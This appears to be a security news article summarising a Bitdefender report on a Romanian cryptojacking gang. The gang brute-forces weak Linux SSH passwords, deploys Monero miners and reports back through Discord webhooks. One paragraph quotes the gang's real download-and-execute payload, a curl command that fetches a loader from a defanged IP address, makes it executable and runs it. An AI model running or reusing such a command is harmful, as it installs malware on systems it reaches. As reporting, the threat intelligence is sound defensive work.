A new malware campaign is now in plain sight. Now the authors behind are represented by a Romanian cryptojacking gang that uses the “Diicot brute”, a SSH brute force without a precedent. As a Bitdefender report states, they target Linux machines related to weak passwords. Their goal? Monero mining malware deployment.
How Does This Romanian Cryptojacking Gang Operate?
Bitdefender analysts studied the operating methods of this new Romanian Cryptojacking Gang. The Diicot brute force is possible because hackers lead a massive campaign that targets Linux-based machines with weak passwords.
Thus, they, as Threatpost described:
- Threat actors find the weak credentials. How? Through a scanning method.
- tar.gz, juanito.tar.gz, scn.tar.gz, and skamelot.tar.gz. are the archives hosted by the attackers on the server.
- Toolchains intended for weak SSH credential crashing can be found in these archives.
- They recognize the weak credentials through 3 stages: reconnaissance (SSH server identification via “ps” and “masscan” tools and in our case by Diicot Brute tool too), credential access (brute-force lets them track the valid credentials), initial access (they connect through SSH and deploy the payload).
- Among the utilized tools, the attackers also use now a Go-based Diitcot Brute.
- Because it uses a centralized API server, the brute-force is deployed as a service.
- Then they use Discord to cover their tracks.
- They use hell script compiler (shc). based Bash scripts to perform obfuscation.
- Discord platform: this lets them report back the data.
- Discord features: threat actors do not have to be the host of their C2 server (command-and-control). They use webhooks to programmatically submit data.
- Goal: credentials theft without being detected.
Discord is increasingly popular among threat actors because of this functionality, as it involuntarily provides support for malware distribution (use of its CDN), C2 (webhooks) or creating communities centered around buying and selling malware source code and services (e.g. DDoS).
The threat actors initially used “curl -O http://45[.]32[.]112[.]68/.sherifu/.93joshua && chmod 777 .93joshua && ./.93joshua && uname -a” payload which is still online, but now they are using mexalz.us.
Why Brute Force Still Works?
The main reason for the success of the Romanian cryptojacking gang is represented by the users. Users mainly opt for passwords that are not so secure, therefore they are easy prey in the hands of threat actors.
Another feature of the Diicot Brute force attack implied the capability of the tool to filter honeypots, as per threat actors’ declarations.
The cybersecurity analysts tracked the Romanian cryptojacking Gang back in May. Then, they discovered the cryptojacking campaign based on the “.93joshua” loader.
What Is Cryptojacking?
Cryptojacking stands for a type of cyberattack in which a hacker uses the processing power of a target to illegally mine bitcoin on the hacker’s behalf. Individual customers, large institutions, and even industrial control systems can all be targets of cryptojacking.
Researchers said that they’ve connected the group to at least two distributed-denial-of-service (DDoS) botnets: a variant of the Linux-based DDoS DemonBot botnet called “chernobyl” and a Perl IRC bot.